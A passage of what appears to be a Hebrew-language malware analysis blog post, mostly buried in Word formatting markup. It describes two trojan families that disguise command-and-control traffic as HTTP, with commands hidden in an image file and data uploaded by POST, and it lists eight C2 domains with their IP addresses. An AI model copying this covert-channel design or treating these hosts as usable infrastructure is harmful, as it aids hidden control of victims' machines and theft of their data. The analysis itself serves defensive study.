Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]><br />
<mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif";} --></p>
<p><!--[endif]--></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">נמצאו 4 שרתים לצורך פקודות והזלגת חומר, כל אחד קצת שונה.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">נמצאו שתי משפחות של סוסים ובשתיהן הסוסים מדברים </span><span dir="ltr">HTTP</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> כדי להראות את ההתקשרות כתמימה.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">המשפחה הראשונה יוצרת קשר לקובץ </span><span dir="ltr">PHP</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> על אחד משני השרתים וכך הסוס מעדכן על מצבו ומקבל הוראות מאיפה להוריד פקודות. הפקודות נמצאות בקובץ שמותמם כתמונה.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">הסוס יוצר קשר עם שרת בפורט 8000 ומשתמש ב-</span><span dir="ltr">HTTP POST </span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> כדי להעלות נתונים אל השרת.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">המשפחה השנייה משתמשת ב-</span><span dir="ltr">HTTP POST</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> כדי להתחבר לסקריפט </span><span dir="ltr">CGI</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> וכך לתקשר בין מחשב הקורבן לשרת הפיקודים. </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">נראה שלמרות שיש שתי משפחות – יחד הסוסים מתפקדים בצורה מלאה כשמשפחה אחת מתמקדת בדוחות ופקודות והשנייה בהבאת מידע.</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">השרתים:</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.lookbytheway.com/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.lookbytheway.com</span></a></span><span dir="ltr"> – 210.51.7.155</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.macfeeresponse.com/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.macfeeresponse.com</span></a></span><span dir="ltr"> &#8211; 210.51.7.155</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.msnppt.net/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.msnppt.net</span></a></span><span dir="ltr"> &#8211; 221.5.250.98</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.msnxy.net/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.msnxy.net</span></a></span><span dir="ltr"> &#8211; 210.51.7.155</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.msnyf.com/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.msnyf.com</span></a></span><span dir="ltr"> &#8211; 221.5.250.98</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.networkcia.com/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.networkcia.com</span></a></span><span dir="ltr"> &#8211; 210.51.7.155</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.indexnews.org/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.indexnews.org</span></a></span><span dir="ltr"> &#8211; 61.188.87.58</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">• </span><span style="font-family: &quot;Times New Roman&quot;,&quot;serif&quot;;" lang="HE"><a href="http://www.indexindian.com/"><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;" dir="ltr" lang="EN-US">www.indexindian.com</span></a></span><span dir="ltr"> &#8211; 210.51.7.155</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" dir="ltr"> </span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">דוגמה לתקשורת עם אותו </span><span dir="ltr">CGI SCRIPT</span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">:</span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"><img class="aligncenter size-full wp-image-1028" title="gr5" src="http://www.hacking.org.il/wp-content/uploads/2009/05/gr5.jpg" alt="gr5" width="614" height="242" /></span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>HE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]><br />
<mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif";} --></p>
<p><!--[endif]--></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">זיהוי שרתי השליטה (פיקודים):</span></p>
